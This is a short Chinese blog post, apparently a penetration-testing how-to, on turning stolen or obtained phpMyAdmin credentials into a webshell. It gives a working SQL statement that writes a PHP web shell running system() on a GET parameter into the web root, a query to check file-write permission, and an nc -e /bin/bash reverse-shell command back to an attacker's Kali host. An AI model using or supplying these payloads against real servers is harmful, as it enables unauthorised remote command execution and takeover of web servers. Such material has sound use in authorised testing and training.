利用phpmyadmin拿Webshell

利用phpmyadmin拿Webshell

当拿到phpmyadmin的用户名密码后,如何拿到webshell呢,步骤如下:

  1. 确认可以通过phpmyadmin写入文件,执行SQL语句:

    show global variables like "secure%";

secure_file_priv:
值为NULL表示禁止限制操作
值为某一目录,则只能操作该目录下的文件
没有值则表示不对读写文件进行限制

  1. 执行下面的SQL语句,生成webshell文件:

    SELECT '<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET["cmd"]) {system($_GET["cmd"]);} ?> </pre></BODY></HTML>' INTO OUTFILE '/var/www/html/huawen.php'

  2. 此时在输入框中输入nc -e /bin/bash <kali linux IP 地址> <端口>

posted @ 2023-01-04 22:15  Jason_huawen  阅读(109)  评论(0编辑  收藏  举报